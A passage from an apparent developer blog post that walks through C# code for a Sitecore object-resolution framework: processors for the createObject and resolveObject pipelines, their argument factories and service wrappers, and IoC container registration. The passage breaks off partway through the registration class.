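The IReflectionUtilService was defined much earlier in this post; as a reminder of the shape such a helper can take, here is a hedged reconstruction (my sketch, not the post's code) built on Activator.CreateInstance:

using System;

// Approximation of a reflection helper matching the calls made above:
// CreateObject(Type) and CreateObject(Type, object[]).
public class ReflectionUtilServiceSketch
{
    public object CreateObject(Type type, params object[] parameters)
    {
        if (type == null)
        {
            return null;
        }

        // The parameterless overload uses the public default constructor; the other
        // matches a constructor by the runtime types of the supplied arguments.
        return parameters == null || parameters.Length == 0
            ? Activator.CreateInstance(type)
            : Activator.CreateInstance(type, parameters);
    }
}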
Now we need to put this IReflectionObjectCreator somewhere so it can be used to create objects. The following interface is for a processor class that adds it to the collection of IObjectCreator instances on the CreateObjectArgs instance:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor
{
    public interface IAddDefaultObjectCreator
    {
        void Process(CreateObjectArgs args);
    }
}

And here is the magic behind the interface above:

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor
{
    public class AddDefaultObjectCreator : ResolveProcessor<CreateObjectArgs>, IAddDefaultObjectCreator
    {
        private readonly IReflectionObjectCreator _reflectionObjectCreator;

        public AddDefaultObjectCreator(IReflectionObjectCreator reflectionObjectCreator)
        {
            _reflectionObjectCreator = reflectionObjectCreator;
        }

        protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Creators != null;

        protected override void Execute(CreateObjectArgs args) => args.Creators.Add(GetObjectCreator());

        protected virtual IObjectCreator GetObjectCreator() => _reflectionObjectCreator;
    }
}

We are just adding the IReflectionObjectCreator instance to the Creators collection on the CreateObjectArgs instance. Now, we need a processor that delegates to each IObjectCreator instance in that collection. The following interface is for a processor that does just that:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor
{
    public interface ICreateObject
    {
        void Process(CreateObjectArgs args);
    }
}

Here's the above interface's implementation class:

using System.Linq;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor
{
    public class CreateObject : ResolveProcessor<CreateObjectArgs>, ICreateObject
    {
        private readonly IObjectCreatorArgumentsFactory _objectCreatorArgumentsFactory;

        public CreateObject(IObjectCreatorArgumentsFactory objectCreatorArgumentsFactory)
        {
            _objectCreatorArgumentsFactory = objectCreatorArgumentsFactory;
        }

        protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.Creators.Any();

        protected override void Execute(CreateObjectArgs args)
        {
            args.Object = CreateObjectFromArguments(args);
        }

        protected virtual object CreateObjectFromArguments(CreateObjectArgs args)
        {
            ObjectCreatorArguments arguments = CreateObjectCreatorArguments(args);

            if (arguments == null)
            {
                return null;
            }

            foreach (IObjectCreator objectCreator in args.Creators)
            {
                object result = CreateObjectFromArguments(objectCreator, arguments);

                if (result != null)
                {
                    return result;
                }
            }

            return null;
        }

        protected virtual ObjectCreatorArguments CreateObjectCreatorArguments(CreateObjectArgs args) => _objectCreatorArgumentsFactory.CreateObjectCreatorArguments(args);

        protected virtual object CreateObjectFromArguments(IObjectCreator objectCreator, ObjectCreatorArguments arguments) => objectCreator.Resolve(arguments);
    }
}

The class above iterates over the IObjectCreator collection on the CreateObjectArgs instance and tries to create an object using each one; the IObjectCreatorArgumentsFactory instance assists by building the ObjectCreatorArguments instance from the CreateObjectArgs instance so it can make those calls. If one of the creators produces an object, the processor uses that and stops iterating.
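Because CreateObject walks every IObjectCreator in args.Creators, other creation strategies can sit next to the reflection-based one. Here is a hedged sketch of a hypothetical alternative (mine, not part of this solution) that uses Microsoft.Extensions.DependencyInjection's ActivatorUtilities, so unregistered types still get their constructor dependencies from the Sitecore container:

using Microsoft.Extensions.DependencyInjection;
using Sitecore.DependencyInjection;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators;

// Hypothetical creator: builds unregistered types while constructor-injecting
// any dependencies that are registered in the Sitecore container.
public class ActivatorUtilitiesObjectCreator : IObjectCreator
{
    public object Resolve(ObjectCreatorArguments arguments)
    {
        if (arguments == null || arguments.Type == null)
        {
            return null;
        }

        return ActivatorUtilities.CreateInstance(
            ServiceLocator.ServiceProvider,
            arguments.Type,
            arguments.Parameters ?? new object[0]);
    }
}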
It's probably a good idea to only cache Types when an object was actually created from the Type. The following interface is for a processor that sets an ITypeCacher on the CreateObjectArgs instance so a later processor can add the Type to a cache (perhaps in a bank somewhere on the Cayman Islands? 😉):

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor
{
    public interface ISetTypeCacher
    {
        void Process(CreateObjectArgs args);
    }
}

Here's the implementation class for the interface above:

using Sandbox.Foundation.ObjectResolution.Services.Cachers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor
{
    public class SetTypeCacher : ResolveProcessor<CreateObjectArgs>, ISetTypeCacher
    {
        private readonly ITypeCacher _typeCacher;

        public SetTypeCacher(ITypeCacher typeCacher)
        {
            _typeCacher = typeCacher;
        }

        protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && args.UseTypeCache && args.TypeCacher == null;

        protected override void Execute(CreateObjectArgs args) => args.TypeCacher = _typeCacher;
    }
}

It's just setting the injected ITypeCacher (its implementation class is defined further up in this post) on the CreateObjectArgs instance. Now, we need to use the ITypeCacher to cache the Type. The following interface is for a processor class that delegates to the ITypeCacher instance to do so:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor
{
    public interface ICacheType
    {
        void Process(CreateObjectArgs args);
    }
}

Here is the processor class which implements the interface above:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor
{
    public class CacheType : ResolveProcessor<CreateObjectArgs>, ICacheType
    {
        protected override bool CanProcess(CreateObjectArgs args) => base.CanProcess(args) && !string.IsNullOrWhiteSpace(args.TypeName) && args.Type != null && args.UseTypeCache && args.TypeCacher != null;

        protected override void Execute(CreateObjectArgs args) => AddTypeToCache(args);

        protected virtual void AddTypeToCache(CreateObjectArgs args) => args.TypeCacher.AddTypeToCache(args.TypeName, args.Type);
    }
}

It should be self-explanatory what's happening here. If not, please drop a comment below.

Now, we need a service class that wraps this new pipeline. I created the following settings class for that service:

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators
{
    public class ObjectCreatorServiceSettings
    {
        public string CreateObjectPipelineName { get; set; }
    }
}

An instance of this class is created by the Sitecore Configuration Factory, just as the other ones in this post are.
I then defined the following interface for the service class that will wrap this new pipeline; it's just another IObjectCreator:

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators
{
    public interface IObjectCreatorService : IObjectCreator
    {
    }
}

This class implements the interface above:

using Sitecore.Abstractions;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators
{
    public class ObjectCreatorService : PipelineObjectResolver<ObjectCreatorArguments, CreateObjectArgs, object>, IObjectCreatorService
    {
        private readonly ObjectCreatorServiceSettings _settings;
        private readonly IObjectCreatorArgumentsFactory _objectCreatorArgumentsFactory;

        public ObjectCreatorService(ObjectCreatorServiceSettings settings, IObjectCreatorArgumentsFactory objectCreatorArgumentsFactory, BaseCorePipelineManager corePipelineManager)
            : base(corePipelineManager)
        {
            _settings = settings;
            _objectCreatorArgumentsFactory = objectCreatorArgumentsFactory;
        }

        protected override object GetObject(CreateObjectArgs args)
        {
            return args.Object;
        }

        protected override CreateObjectArgs CreatePipelineArgs(ObjectCreatorArguments arguments) => _objectCreatorArgumentsFactory.CreateCreateObjectArgs(arguments);

        protected override string GetPipelineName() => _settings.CreateObjectPipelineName;
    }
}

I'm not going to go into details on the above, as you have seen this pattern further up in this post.

<resolveObject />

Now we need a way to glue all the pipelines created above together. The following PipelineArgs class is for (yet another pipeline 😉) that does the gluing:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sitecore.Pipelines;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject
{
    public class ResolveObjectArgs : PipelineArgs
    {
        public Database Database { get; set; }
        public string ItemPath { get; set; }
        public Language Language { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public ITypeResolver TypeResolver { get; set; }
        public Type Type { get; set; }
        public IObjectLocator ObjectLocator { get; set; }
        public bool FoundInContainer { get; set; }
        public IObjectCreator ObjectCreator { get; set; }
        public bool UseTypeCache { get; set; }
        public object[] ObjectCreationParameters { get; set; }
        public object Object { get; set; }
    }
}

I also created the following class for the service class that will wrap this new pipeline:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers
{
    public class ObjectResolverArguments
    {
        public Database Database { get; set; }
        public Language Language { get; set; }
        public string ItemPath { get; set; }
        public Item Item { get; set; }
        public string TypeFieldName { get; set; }
        public string TypeName { get; set; }
        public Type Type { get; set; }
        public bool UseTypeCache { get; set; }
        public object[] ObjectCreationParameters { get; set; }
    }
}

I bet you are guessing that I'm going to create another factory for these two classes above. Yep, you are correct.
Here is the interface for that factory:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers
{
    public interface IObjectResolverArgumentsFactory
    {
        ObjectResolverArguments CreateObjectResolverArguments(Database database, string itemPath, string typeFieldName, Language language, object[] objectCreationParameters);

        ObjectResolverArguments CreateObjectResolverArguments(Item item, string typeFieldName, bool useTypeCache, object[] objectCreationParameters);

        ResolveObjectArgs CreateResolveObjectArgs(ObjectResolverArguments arguments);

        ResolveObjectArgs CreateResolveObjectArgs(Database database = null, string itemPath = null, Language language = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] objectCreationParameters = null);
    }
}

The following class implements the factory interface above:

using System;
using Sitecore.Data;
using Sitecore.Data.Items;
using Sitecore.Globalization;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;

namespace Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers
{
    public class ObjectResolverArgumentsFactory : IObjectResolverArgumentsFactory
    {
        public ObjectResolverArguments CreateObjectResolverArguments(Database database, string itemPath, string typeFieldName, Language language, object[] objectCreationParameters)
        {
            return new ObjectResolverArguments
            {
                Database = database,
                ItemPath = itemPath,
                TypeFieldName = typeFieldName,
                Language = language,
                ObjectCreationParameters = objectCreationParameters
            };
        }

        public ObjectResolverArguments CreateObjectResolverArguments(Item item, string typeFieldName, bool useTypeCache, object[] objectCreationParameters)
        {
            return new ObjectResolverArguments
            {
                Item = item,
                TypeFieldName = typeFieldName,
                UseTypeCache = useTypeCache,
                ObjectCreationParameters = objectCreationParameters
            };
        }

        public ResolveObjectArgs CreateResolveObjectArgs(ObjectResolverArguments arguments)
        {
            if (arguments == null)
            {
                return null;
            }

            return CreateResolveObjectArgs(arguments.Database, arguments.ItemPath, arguments.Language, arguments.Item, arguments.TypeFieldName, arguments.TypeName, arguments.Type, arguments.UseTypeCache, arguments.ObjectCreationParameters);
        }

        public ResolveObjectArgs CreateResolveObjectArgs(Item item, string typeFieldName, object[] objectCreationParameters)
        {
            return new ResolveObjectArgs
            {
                Item = item,
                TypeFieldName = typeFieldName,
                ObjectCreationParameters = objectCreationParameters
            };
        }

        public ResolveObjectArgs CreateResolveObjectArgs(Database database = null, string itemPath = null, Language language = null, Item item = null, string typeFieldName = null, string typeName = null, Type type = null, bool useTypeCache = false, object[] objectCreationParameters = null)
        {
            return new ResolveObjectArgs
            {
                Database = database,
                ItemPath = itemPath,
                Language = language,
                Item = item,
                TypeFieldName = typeFieldName,
                TypeName = typeName,
                Type = type,
                UseTypeCache = useTypeCache,
                ObjectCreationParameters = objectCreationParameters
            };
        }
    }
}

The following interface is for a processor class that sets the ITypeResolver on the ResolveObjectArgs instance:
namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject
{
    public interface ISetTypeResolver
    {
        void Process(ResolveObjectArgs args);
    }
}

Here's its implementation class:

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject
{
    public class SetTypeResolver : ResolveProcessor<ResolveObjectArgs>, ISetTypeResolver
    {
        private readonly ITypeResolverService _typeResolverService;

        public SetTypeResolver(ITypeResolverService typeResolverService)
        {
            _typeResolverService = typeResolverService;
        }

        protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.TypeResolver == null;

        protected override void Execute(ResolveObjectArgs args)
        {
            args.TypeResolver = GetTypeResolver();
        }

        protected virtual ITypeResolver GetTypeResolver() => _typeResolverService;
    }
}

We have already seen this twice, so I won't discuss it again. 😉 Next, we need to resolve the Type. The following interface is for a processor class that does that type resolution:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ResolveTypeProcessor
{
    public interface IResolveType
    {
        void Process(ResolveObjectArgs args);
    }
}

Here's the class that implements the interface above:

using System;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.ResolveTypeProcessor
{
    public class ResolveType : ResolveProcessor<ResolveObjectArgs>, IResolveType
    {
        private readonly ITypeResolverArgumentsFactory _typeResolverArgumentsFactory;

        public ResolveType(ITypeResolverArgumentsFactory typeResolverArgumentsFactory)
        {
            _typeResolverArgumentsFactory = typeResolverArgumentsFactory;
        }

        protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.Type == null && args.TypeResolver != null;

        protected override void Execute(ResolveObjectArgs args)
        {
            args.Type = Resolve(args);
        }

        protected virtual Type Resolve(ResolveObjectArgs args)
        {
            TypeResolverArguments arguments = CreateTypeResolverArguments(args);

            if (arguments == null)
            {
                return null;
            }

            return args.TypeResolver.Resolve(arguments);
        }

        protected virtual TypeResolverArguments CreateTypeResolverArguments(ResolveObjectArgs args) => _typeResolverArgumentsFactory.CreateTypeResolverArguments(args);
    }
}

I'm also not going to discuss this, as I've done so somewhere up above. 😉 Now we need to set the service that will "locate" objects in the Sitecore IoC container.
The following interface is for a processor class that does just that:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor
{
    public interface ISetObjectLocator
    {
        void Process(ResolveObjectArgs args);
    }
}

The following class implements the interface above:

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor
{
    public class SetObjectLocator : ResolveProcessor<ResolveObjectArgs>, ISetObjectLocator
    {
        private readonly IObjectLocatorService _objectLocatorService;

        public SetObjectLocator(IObjectLocatorService objectLocatorService)
        {
            _objectLocatorService = objectLocatorService;
        }

        protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.ObjectLocator == null;

        protected override void Execute(ResolveObjectArgs args) => args.ObjectLocator = GetObjectLocator();

        protected virtual IObjectLocator GetObjectLocator() => _objectLocatorService;
    }
}

The class above just sets the IObjectLocatorService (the service class which wraps the <locateObject /> pipeline defined further up in this post) on the ResolveObjectArgs instance. I then created the following interface for a processor that delegates to the ObjectLocator property on the ResolveObjectArgs to "locate" the object:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.LocateObjectProcessor
{
    public interface ILocateObject
    {
        void Process(ResolveObjectArgs args);
    }
}

And here's the class that implements the interface above:

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.LocateObjectProcessor
{
    public class LocateObject : ResolveProcessor<ResolveObjectArgs>, ILocateObject
    {
        private readonly IObjectLocatorArgumentsFactory _objectLocatorArgumentsFactory;

        public LocateObject(IObjectLocatorArgumentsFactory objectLocatorArgumentsFactory)
        {
            _objectLocatorArgumentsFactory = objectLocatorArgumentsFactory;
        }

        protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.Object == null && args.ObjectLocator != null;

        protected override void Execute(ResolveObjectArgs args)
        {
            args.Object = Locate(args);
            args.FoundInContainer = args.Object != null;

            if (!args.FoundInContainer)
            {
                return;
            }

            AbortPipeline(args);
        }

        protected virtual object Locate(ResolveObjectArgs args) => args.ObjectLocator.Resolve(CreateObjectLocatorArguments(args));

        protected virtual ObjectLocatorArguments CreateObjectLocatorArguments(ResolveObjectArgs args) => _objectLocatorArgumentsFactory.CreateObjectLocatorArguments(args);
    }
}

The class above just tries to "locate" the object using the ObjectLocator set on the ResolveObjectArgs instance. If the object is found, the FoundInContainer flag is set and the pipeline is aborted, since there is nothing left to do. In the event we can't find the object via the IObjectLocator, we should create the object instead.
I created the following interface for a processor that sets an IObjectCreator instance on the ResolveObjectArgs instance:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor
{
    public interface ISetObjectCreator
    {
        void Process(ResolveObjectArgs args);
    }
}

And here's its implementation class:

using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor
{
    public class SetObjectCreator : ResolveProcessor<ResolveObjectArgs>, ISetObjectCreator
    {
        private readonly IObjectCreatorService _objectCreatorService;

        public SetObjectCreator(IObjectCreatorService objectCreatorService)
        {
            _objectCreatorService = objectCreatorService;
        }

        protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.ObjectCreator == null;

        protected override void Execute(ResolveObjectArgs args) => args.ObjectCreator = GetObjectCreator();

        protected virtual IObjectCreator GetObjectCreator() => _objectCreatorService;
    }
}

The class above just sets the IObjectCreatorService (the service class which wraps the <createObject /> pipeline defined further up in this post) on the ResolveObjectArgs instance. Next, we need to delegate to this IObjectCreator to create the object. The following interface is for a processor class that creates objects:

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.CreateObjectProcessor
{
    public interface ICreateObject
    {
        void Process(ResolveObjectArgs args);
    }
}

And here's the implementation of the interface above:

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators;

namespace Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.CreateObjectProcessor
{
    public class CreateObject : ResolveProcessor<ResolveObjectArgs>, ICreateObject
    {
        private readonly IObjectCreatorArgumentsFactory _objectCreatorArgumentsFactory;

        public CreateObject(IObjectCreatorArgumentsFactory objectCreatorArgumentsFactory)
        {
            _objectCreatorArgumentsFactory = objectCreatorArgumentsFactory;
        }

        protected override bool CanProcess(ResolveObjectArgs args) => base.CanProcess(args) && args.Object == null && args.ObjectCreator != null;

        protected override void Execute(ResolveObjectArgs args) => args.Object = Resolve(args);

        protected virtual object Resolve(ResolveObjectArgs args) => args.ObjectCreator.Resolve(CreateObjectCreatorArguments(args));

        protected virtual ObjectCreatorArguments CreateObjectCreatorArguments(ResolveObjectArgs args) => _objectCreatorArgumentsFactory.CreateObjectCreatorArguments(args);
    }
}

The class above just delegates to the IObjectCreator instance on the ResolveObjectArgs instance to create the object.

Like the other 4 pipelines (holy cannoli, Batman, there are 5 pipelines in total in this solution!), I created a service class that wraps this new pipeline. The following class serves as a settings class for this service:

namespace Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers
{
    public class ObjectResolverServiceSettings
    {
        public string ResolveObjectPipelineName { get; set; }
        public bool UseTypeCache { get; set; }
    }
}

An instance of the above is created by the Sitecore Configuration Factory. The following interface defines a family of classes that "resolve" objects.
Unlike the other pipelines, we will only have one class that implements this interface:

using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectResolvers
{
    public interface IObjectResolver
    {
        TObject Resolve<TObject>(ObjectResolverArguments arguments) where TObject : class;

        object Resolve(ObjectResolverArguments arguments);
    }
}

The following class implements the interface above:

using Sitecore.Abstractions;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers;

namespace Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectResolvers
{
    public class ObjectResolverService : PipelineObjectResolver<ObjectResolverArguments, ResolveObjectArgs, object>, IObjectResolver
    {
        private readonly ObjectResolverServiceSettings _settings;
        private readonly IObjectResolverArgumentsFactory _objectResolverArgumentsFactory;

        public ObjectResolverService(ObjectResolverServiceSettings settings, IObjectResolverArgumentsFactory objectResolverArgumentsFactory, BaseCorePipelineManager corePipelineManager)
            : base(corePipelineManager)
        {
            _settings = settings;
            _objectResolverArgumentsFactory = objectResolverArgumentsFactory;
        }

        public TObject Resolve<TObject>(ObjectResolverArguments arguments) where TObject : class
        {
            return Resolve(arguments) as TObject;
        }

        protected override object GetObject(ResolveObjectArgs args)
        {
            return args.Object;
        }

        protected override ResolveObjectArgs CreatePipelineArgs(ObjectResolverArguments arguments) => _objectResolverArgumentsFactory.CreateResolveObjectArgs(arguments);

        protected override string GetPipelineName() => _settings.ResolveObjectPipelineName;
    }
}
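Before wiring everything up, here is a hedged sketch of what consuming IObjectResolver could look like (the consumer class, the service type parameter and the "Widget Type" field name are hypothetical examples of mine):

using Sitecore.Data.Items;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectResolvers;

// Hypothetical consumer: reads a type name from an Item's "Widget Type" field,
// checks the IoC container first, then falls back to reflection-based creation.
public class WidgetFactory
{
    private readonly IObjectResolverArgumentsFactory _argumentsFactory;
    private readonly IObjectResolver _objectResolver;

    public WidgetFactory(IObjectResolverArgumentsFactory argumentsFactory, IObjectResolver objectResolver)
    {
        _argumentsFactory = argumentsFactory;
        _objectResolver = objectResolver;
    }

    public TService CreateFromItem<TService>(Item item) where TService : class
    {
        ObjectResolverArguments arguments = _argumentsFactory.CreateObjectResolverArguments(item, "Widget Type", true, null);

        return _objectResolver.Resolve<TService>(arguments);
    }
}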
I then registered every single thing above (and I mean EVERYTHING) in the Sitecore IoC container via the following IServicesConfigurator class:

using System;
using Microsoft.Extensions.DependencyInjection;
using Sitecore.Abstractions;
using Sitecore.DependencyInjection;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Models.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.AddDefaultObjectCreatorProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CacheTypeProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.CreateObjectProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.ResolveTypeProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeCacherProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.CreateObject.SetTypeResolverProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.AddDefaultObjectLocatorProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.LocateObject.LocateObjectProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.AddDefaultItemResolverProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveItem.ResolveItemProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectCreatorProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveObject.SetObjectLocatorProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.AddDefaultTypeResolverProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetItemResolverProcessor;
using Sandbox.Foundation.ObjectResolution.Pipelines.ResolveType.SetTypeNameProcessor;
using Sandbox.Foundation.ObjectResolution.Services.Cachers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Factories.Resolvers.TypeResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Reflection;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ItemResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectCreators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectLocators;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.ObjectResolvers;
using Sandbox.Foundation.ObjectResolution.Services.Resolvers.TypeResolvers;

namespace Sandbox.Foundation.ObjectResolution
{
    public class ObjectResolutionConfigurator : IServicesConfigurator
    {
        public void Configure(IServiceCollection serviceCollection)
        {
            ConfigureCachers(serviceCollection);
            ConfigureFactories(serviceCollection);
            ConfigureItemResolvers(serviceCollection);
            ConfigureTypeResolvers(serviceCollection);
            ConfigureObjectCreators(serviceCollection);
            ConfigureObjectLocators(serviceCollection);
            ConfigureObjectResolvers(serviceCollection);
            ConfigureResolveItemPipelineProcessors(serviceCollection);
            ConfigureResolveTypePipelineProcessors(serviceCollection);
            ConfigureLocateObjectPipelineProcessors(serviceCollection);
            ConfigureCreateObjectPipelineProcessors(serviceCollection);
            ConfigureResolveObjectPipelineProcessors(serviceCollection);
            ConfigureOtherServices(serviceCollection);
        }

        private void ConfigureCachers(IServiceCollection serviceCollection)
        {
            serviceCollection.AddSingleton<ITypeCacher, TypeCacher>();
        }

        private void ConfigureFactories(IServiceCollection serviceCollection)
        {
            serviceCollection.AddSingleton<IItemResolverArgumentsFactory, ItemResolverArgumentsFactory>();
            serviceCollection.AddSingleton<ITypeResolverArgumentsFactory, TypeResolverArgumentsFactory>();
            serviceCollection.AddSingleton<IObjectLocatorArgumentsFactory, ObjectLocatorArgumentsFactory>();
            serviceCollection.AddSingleton<IObjectCreatorArgumentsFactory, ObjectCreatorArgumentsFactory>();
            serviceCollection.AddSingleton<IObjectResolverArgumentsFactory, ObjectResolverArgumentsFactory>();
        }

        private void ConfigureItemResolvers(IServiceCollection serviceCollection)
        {
            serviceCollection.AddSingleton<IDatabaseItemResolver, DatabaseItemResolver>();
            serviceCollection.AddSingleton(GetItemResolverServiceSetting);
            serviceCollection.AddSingleton<IItemResolverService, ItemResolverService>();
        }

        private ItemResolverServiceSettings GetItemResolverServiceSetting(IServiceProvider provider)
        {
            return CreateConfigObject<ItemResolverServiceSettings>(provider, "moduleSettings/foundation/objectResolution/itemResolverServiceSettings");
        }

        private void ConfigureTypeResolvers(IServiceCollection serviceCollection)
        {
            serviceCollection.AddSingleton<IReflectionTypeResolver, ReflectionTypeResolver>();
serviceCollection.AddSingleton(GetTypeResolverServiceSettings); serviceCollection.AddSingleton<ITypeResolverService, TypeResolverService>(); } private TypeResolverServiceSettings GetTypeResolverServiceSettings(IServiceProvider provider) { return CreateConfigObject<TypeResolverServiceSettings>(provider, "moduleSettings/foundation/objectResolution/typeResolverServiceSettings"); } private void ConfigureObjectCreators(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IReflectionObjectCreator, ReflectionObjectCreator>(); serviceCollection.AddSingleton(GetObjectCreatorServiceSettings); serviceCollection.AddSingleton<IObjectCreatorService, ObjectCreatorService>(); } private ObjectCreatorServiceSettings GetObjectCreatorServiceSettings(IServiceProvider provider) { return CreateConfigObject<ObjectCreatorServiceSettings>(provider, "moduleSettings/foundation/objectResolution/objectCreatorServiceSettings"); } private void ConfigureObjectLocators(IServiceCollection serviceCollection) { serviceCollection.AddSingleton<IServiceProviderLocator, ServiceProviderLocator>(); serviceCollection.AddSingleton(GetObjectLocatorServiceSettings); serviceCollection.AddSingleton<IObjectLocatorService, ObjectLocatorService>(); } private ObjectLocatorServiceSettings GetObjectLocatorServiceSettings(IServiceProvider provider) { return 